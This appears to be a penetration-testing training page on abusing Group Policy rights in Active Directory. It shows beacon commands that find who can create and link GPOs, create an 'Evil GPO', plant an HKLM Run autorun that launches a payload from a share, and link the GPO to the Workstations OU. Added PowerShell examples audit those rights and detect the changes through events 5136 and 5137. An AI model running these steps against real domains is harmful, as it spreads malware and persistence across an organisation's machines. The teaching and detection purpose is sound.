# Create & Link a GPO

Group Policy Objects are stored in the *CN=Policies,CN=System* container. Principals that can create new GPOs in the domain have the "Create groupPolicyContainer objects" privilege over this container. We can find these with PowerView's `Get-DomainObjectAcl` cmdlet by looking for those that have "CreateChild" rights on the "Group-Policy-Container" object type, and then resolving their SIDs to readable names.

```
beacon> powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

DEV\Developers
```

This shows that members of the "Developers" group can create new GPOs.

Being able to create a GPO doesn't achieve anything unless it can be linked to an OU. The ability to link a GPO to an OU is controlled on the OU itself by granting "Write gPLink" privileges.

This is also something we can find with PowerView: first get all of the domain OUs and pipe them into `Get-DomainObjectAcl` again, then iterate over each ACE looking for instances of "WriteProperty" over "GP-Link".

```
beacon> powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl

ObjectDN              : OU=Workstations,DC=dev,DC=cyberbotic,DC=io
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType         : GP-Link
SecurityIdentifier    : S-1-5-21-569305411-121244042-2357301523-1107

beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
DEV\Developers
```

This shows that members of the "Developers" group can link GPOs to the "Workstations" OU.
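The two PowerView queries above answer the same question from the attacker's side. The following is an added example, not code from the original page or from PowerView, that performs the same audit with the Microsoft ActiveDirectory RSAT module so a defender can run it on a management host and flag unexpected principals. It assumes the module is installed, that the `AD:` drive it creates is available, and that the caller can read the security descriptors; the GUIDs for `groupPolicyContainer` and `gPLink` are resolved from the schema at run time rather than hard-coded. The list of expected principals is a constructed starting point to adjust for the environment.

```powershell
# Added example, not from the original page: audit who can create GPOs and who can
# link them, using the Microsoft ActiveDirectory RSAT module (AD: drive) instead of
# PowerView. Assumes the module is installed and the caller can read the ACLs.
Import-Module ActiveDirectory

# Resolve the schema GUIDs at run time so nothing is hard-coded.
function Get-SchemaGuid {
    param([Parameter(Mandatory)][string]$LdapDisplayName)
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $obj = Get-ADObject -SearchBase $schemaNC -LDAPFilter "(lDAPDisplayName=$LdapDisplayName)" -Properties schemaIDGUID
    [guid]$obj.schemaIDGUID
}
$gpcGuid    = Get-SchemaGuid groupPolicyContainer   # object class created by New-GPO
$gpLinkGuid = Get-SchemaGuid gPLink                 # attribute written by New-GPLink

# Returns the Allow ACEs on $Path that grant $Right either specifically for $ObjectGuid
# or for all object types/properties (empty ObjectType, e.g. GenericAll / GenericWrite).
function Get-MatchingAce {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][System.DirectoryServices.ActiveDirectoryRights]$Right,
        [Parameter(Mandatory)][guid]$ObjectGuid
    )
    (Get-Acl -Path "AD:\$Path").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.ActiveDirectoryRights.HasFlag($Right) -and
            ($_.ObjectType -eq $ObjectGuid -or $_.ObjectType -eq [guid]::Empty)
        } |
        Select-Object @{ n = 'Container'; e = { $Path } }, IdentityReference, ActiveDirectoryRights, IsInherited
}

# Who can create GPOs: CreateChild of groupPolicyContainer on the Policies container.
function Get-GpoCreationRights {
    $domainDN = (Get-ADDomain).DistinguishedName
    Get-MatchingAce -Path "CN=Policies,CN=System,$domainDN" -Right CreateChild -ObjectGuid $gpcGuid
}

# Who can link GPOs: WriteProperty on gPLink for the domain root and every OU.
function Get-GpoLinkRights {
    $targets = @((Get-ADDomain).DistinguishedName) +
               (Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName)
    foreach ($dn in $targets) {
        Get-MatchingAce -Path $dn -Right WriteProperty -ObjectGuid $gpLinkGuid
    }
}

# Principals expected to hold these rights (constructed list; adjust to the environment).
# Only the name after the last backslash is compared, so ROOT\Enterprise Admins also matches.
$expected = 'SYSTEM', 'Administrators', 'Domain Admins', 'Enterprise Admins', 'Group Policy Creator Owners'

$findings = @(Get-GpoCreationRights) + @(Get-GpoLinkRights) |
    Where-Object { ($_.IdentityReference.Value -split '\\')[-1] -notin $expected }
$findings | Format-Table -AutoSize
```

In the environment described on this page, `DEV\Developers` would appear twice in the output: once with `CreateChild` on the Policies container and once with `WriteProperty` on `OU=Workstations`. A right granted through a property set rather than directly on `gPLink` would not match the GUID comparison, so treat the result as a lower bound and review any `GenericAll`/`GenericWrite` grants separately.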

GPOs can be managed from the command line via the PowerShell RSAT modules. These are an optional install and so are usually only found on management workstations. The `Get-Module` cmdlet will show if they are present.

```
beacon> powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

Key                        Value                     
---                        -----                     
Backup-GPO                 Backup-GPO                
Block-GPInheritance        Block-GPInheritance       
Copy-GPO                   Copy-GPO                  
Get-GPInheritance          Get-GPInheritance         
Get-GPO                    Get-GPO                   
[...]
```

Use the `New-GPO` cmdlet to create and link a new GPO.

```
beacon> powershell New-GPO -Name "Evil GPO"

DisplayName      : Evil GPO
DomainName       : dev.cyberbotic.io
Owner            : DEV\bfarmer
Id               : 550f6672-bdd0-4e3d-8907-628ee6909f26
GpoStatus        : AllSettingsEnabled
Description      : 
CreationTime     : 9/8/2022 1:30:17 PM
ModificationTime : 9/8/2022 1:30:17 PM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 0, SysVol Version: 0
WmiFilter        : 
```

Some abuses can be implemented directly using RSAT. For example, the `Set-GPPrefRegistryValue` cmdlet can be used to add an HKLM autorun key to the registry.

```
beacon> powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns_x64.exe" -Type ExpandString
```

Next, apply the GPO to the target OU.

```
beacon> powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"

GpoId       : 550f6672-bdd0-4e3d-8907-628ee6909f26
DisplayName : Evil GPO
Enabled     : True
Enforced    : False
Target      : OU=Workstations,DC=dev,DC=cyberbotic,DC=io
Order       : 4
```

Remember that HKLM autoruns require a reboot to execute.
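Each step above leaves a trace in the Security log of the domain controller that processed it: `New-GPO` creates a `groupPolicyContainer` object (event 5137) and `New-GPLink` rewrites the `gPLink` attribute of the target OU (event 5136). The following is an added example, not code from the original page, that pulls those two events and reduces them to who did what to which object. It assumes the "Audit Directory Service Changes" subcategory is enabled and that a SACL exists on `CN=Policies,CN=System` and on the OUs of interest; without both, these events are never written. The `Get-WinEvent` call and the event data field names are the standard ones for 5136/5137.

```powershell
# Added example, not from the original page: collect the Security-log events a domain
# controller writes when a GPO object is created (5137) or a gPLink attribute is changed
# (5136). Assumes "Audit Directory Service Changes" is enabled and a SACL exists on
# CN=Policies,CN=System and on the OUs of interest; without both, nothing is logged.
function Get-GpoChangeEvents {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # run against a domain controller
        [datetime]$Since = (Get-Date).AddDays(-1)
    )
    $filter = @{ LogName = 'Security'; Id = 5136, 5137; StartTime = $Since }
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($evt in $events) {
        # Flatten <EventData><Data Name="...">value</Data> into a hashtable.
        $xml  = [xml]$evt.ToXml()
        $data = @{}
        foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
        $actor = '{0}\{1}' -f $data.SubjectDomainName, $data.SubjectUserName

        if ($evt.Id -eq 5137 -and $data.ObjectClass -eq 'groupPolicyContainer') {
            [pscustomobject]@{
                Time   = $evt.TimeCreated
                Change = 'GPO created'
                Actor  = $actor
                Object = $data.ObjectDN          # CN={gpo guid},CN=Policies,CN=System,...
                Value  = $null
            }
        }
        elseif ($evt.Id -eq 5136 -and $data.AttributeLDAPDisplayName -eq 'gPLink') {
            # A link change is logged as two events: %%14675 (value deleted) carrying the
            # old gPLink string, then %%14674 (value added) carrying the new one.
            $op = switch ($data.OperationType) {
                '%%14674' { 'gPLink value added' }
                '%%14675' { 'gPLink value deleted' }
                default   { "gPLink changed ($_)" }
            }
            [pscustomobject]@{
                Time   = $evt.TimeCreated
                Change = $op
                Actor  = $actor
                Object = $data.ObjectDN          # the OU or domain root that was (un)linked
                Value  = $data.AttributeValue    # [LDAP://cn={guid},cn=policies,...;0] entries
            }
        }
    }
}

# Newest first; compare the GUID in a "GPO created" DN with the GUID added to a gPLink value
# shortly afterwards to tie a creation to the link that made it effective.
Get-GpoChangeEvents | Sort-Object Time -Descending | Format-Table -AutoSize
```

The sequence on this page would produce a 5137 for the new container under `CN=Policies`, followed by a deleted/added pair of 5136 events on `OU=Workstations` whose added value contains the same GUID. A creation or link by an account that is not in the set of principals expected to manage Group Policy, or a link appearing within minutes of a creation outside a change window, is the condition worth alerting on.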

